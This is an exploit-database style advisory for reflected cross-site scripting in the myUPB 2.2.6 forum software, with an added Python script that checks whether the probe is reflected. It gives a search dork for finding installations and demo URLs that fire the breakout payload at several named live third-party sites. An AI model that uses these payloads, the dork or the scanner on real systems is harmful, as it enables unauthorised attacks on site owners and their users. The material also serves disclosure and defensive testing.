
myUPB v2.2.6 - Cross Site Scripting (XSS)

Author: wlhaan hacker, Published: 24-10-2014
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|              [ASCII-art banner]   >> team wlhaan hacker             |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|





_____________________________________________________

myUPB v2.2.6 - Cross Site Scripting (XSS)



#####################################################
# [+] Author      : wlhaan hacker                   #
# [+] Email       : iit@HoTMaiL.coM                 #
# [+] Site script : http://forum.myupb.com///       #
# [+] Team        : wlhaan Hacker                   #
# [+] Dork        : Powered by myUPB v2.2.6         #
#####################################################

Exploit:

Reflected XSS in two scripts. The parameter value is written back into the
response without HTML encoding, so the quote/angle-bracket breakout sequence
in the payload reaches the browser as markup:

http://server/path/getpass.php   (POST parameter u_name)

or

http://server/path/login.php     (GET parameter ref)

POC

POST /Forum/getpass.php with the form field:
u_name=Joey.htaccess.aspx-->">'>'"

Captured request headers (the form body itself is not reproduced in the
capture; the Content-Length is that of the original body). The User-Agent
ending in Vega/1.0 shows the issue was found with the Vega web scanner; the
<vvv...> canary tag in the demo URLs below is that scanner's reflection
marker:

POST /Forum/getpass.php HTTP/1.1
Content-Length: 70
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Host: www.uninga.de
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Vega/1.0
Cookie: PHPSESSID=ok0u08063dqa2n4sftvt54phb2; lastvisit=1413729748; timezone=0
Cookie2: $Version=1








# [+] DEMO

Decoded, every demo URL carries the same breakout sequence after an
arbitrary prefix (the digits in the canary tag vary per request):

  -->">'>'"<vvv000011v178410>

The canary tag is harmless on its own; the point is that a page which
reflects it unencoded will reflect a <script> tag just the same.

login.php, ref parameter:

http://www.josegarcialawncare.com/mboard/login.php?ref=null.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000011v178410%3E

http://www.uninga.de/Forum/login.php?ref=null.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000011v178410%3E

http://superbowl.no/forum/login.php?ref=null.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000011v178410%3E

search.php, q parameter (same pattern):

http://dc.roosamanna.ee/search.php?q=1.htaccess.aspx--%3E%22%3E%27%3E%27%22%3Cvvv000035v178410%3E&user=name&req=1&forums_req=1&intopic=on
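Added example, not code from the advisory or from myUPB itself: a small Python script that rebuilds the two injection points above (login.php?ref= by GET, getpass.php u_name by POST) with the advisory's probe string, and classifies a response as reflecting the canary raw (markup injection works), entity-encoded (the value was escaped), or not at all. The canary constant is the one from the demo URLs; the getpass.php value is assumed to use the same probe as the login.php demo, and the two sample HTML responses, the input-attribute context they place the value in, and the helper names (make_probe, classify_reflection, check_target, fetch) are assumptions made for illustration. Without an argument it only evaluates the constructed samples; with a base URL it probes a live install, which you should only do on a system you are authorised to test.

```python
#!/usr/bin/env python3
"""Offline-testable reproduction check for the myUPB 2.2.6 reflected XSS.

Added example (not the advisory's or myUPB's code). Only the probe string,
the canary and the two script paths come from the advisory; the sample
responses and the attribute context are assumptions for illustration.
"""
from __future__ import annotations

import html
import sys
import urllib.parse
import urllib.request

# Canary taken from the advisory's demo URLs; any unique tag name works.
CANARY = "vvv000011v178410"


def make_probe(canary: str = CANARY) -> str:
    """The advisory's payload: comment/attribute breakouts, then a harmless
    canary tag. If the tag reaches the page unencoded, <script> would too."""
    return f'null.htaccess.aspx-->">\'>\'"<{canary}>'


def login_probe_url(base: str, canary: str = CANARY) -> str:
    """GET injection point: login.php?ref=<probe>, percent-encoded like the demo."""
    query = urllib.parse.urlencode({"ref": make_probe(canary)})
    return f"{base.rstrip('/')}/login.php?{query}"


def getpass_request(base: str, canary: str = CANARY) -> tuple[str, bytes]:
    """POST injection point: getpass.php with u_name=<probe> as a form body."""
    body = urllib.parse.urlencode({"u_name": make_probe(canary)}).encode()
    return f"{base.rstrip('/')}/getpass.php", body


def classify_reflection(body: str, canary: str = CANARY) -> str:
    """'raw'     -> '<canary>' echoed verbatim: markup injection works (XSS)
       'encoded' -> canary present but angle brackets are HTML entities: safe
       'absent'  -> canary not reflected at all (filtered or never echoed)"""
    tag = f"<{canary}>"
    if tag in body:
        return "raw"
    if html.escape(tag) in body:  # '&lt;canary&gt;'
        return "encoded"
    return "absent"


# Constructed sample responses (assumed, not captured from any real site).
# Vulnerable pattern: the submitted value is written straight back into an
# input's value attribute, so '">' closes the attribute and the tag.
SAMPLE_VULNERABLE = (
    '<form method="post"><input type="text" name="u_name" value="'
    + make_probe() + '"></form>'
)
# Fixed pattern: same template, value passed through an HTML escaper
# (the PHP equivalent is htmlspecialchars($u_name, ENT_QUOTES)).
SAMPLE_FIXED = (
    '<form method="post"><input type="text" name="u_name" value="'
    + html.escape(make_probe(), quote=True) + '"></form>'
)


def fetch(url: str, data: bytes | None = None, timeout: float = 10.0) -> str:
    """Issue the request and return the body as text (network; live mode only)."""
    req = urllib.request.Request(url, data=data, headers={"User-Agent": "xss-check/1.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def check_target(base: str) -> dict[str, str]:
    """Probe both injection points on a live install and classify each."""
    results: dict[str, str] = {}
    results["login.php?ref"] = classify_reflection(fetch(login_probe_url(base)))
    url, body = getpass_request(base)
    results["getpass.php u_name"] = classify_reflection(fetch(url, data=body))
    return results


if __name__ == "__main__":
    if len(sys.argv) == 2:
        for point, verdict in check_target(sys.argv[1]).items():
            print(f"{point}: {verdict}")
    else:
        print(f"usage: {sys.argv[0]} http://server/path  (running offline samples instead)")
        print("vulnerable sample:", classify_reflection(SAMPLE_VULNERABLE))
        print("fixed sample:     ", classify_reflection(SAMPLE_FIXED))
```

The 'encoded' verdict only covers entity escaping of the angle brackets; a page that reflects the value inside a JavaScript string or an unquoted attribute needs its own context-specific check, which this script does not attempt.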


just use your mind

and good luck :D



miss to : shooq hacker ..



#####################################################

Discovered By : wlhaan hacker



https://twitter.com/waleedal3ybani



https://www.facebook.com/waleed.alaibani

#####################################################
